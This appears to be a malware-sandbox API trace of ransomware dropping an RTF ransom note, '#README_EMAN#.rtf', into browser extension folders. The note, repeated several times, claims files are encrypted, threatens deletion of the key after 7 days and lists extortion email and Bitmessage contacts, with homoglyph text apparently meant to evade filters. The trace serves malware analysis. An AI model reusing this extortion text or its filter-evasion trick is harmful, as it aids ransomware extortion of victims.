l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.048] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nSë\x91W[d¼\"òÈF\x17þê\x89|ó¢kö\x97pcÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.048] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.049] CloseHandle (hObject=0x294) returned 1 [0285.049] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\#readme_eman#.rtf")) returned 0xffffffff [0285.049] GetLastError () returned 0x2 [0285.049] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.049] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n 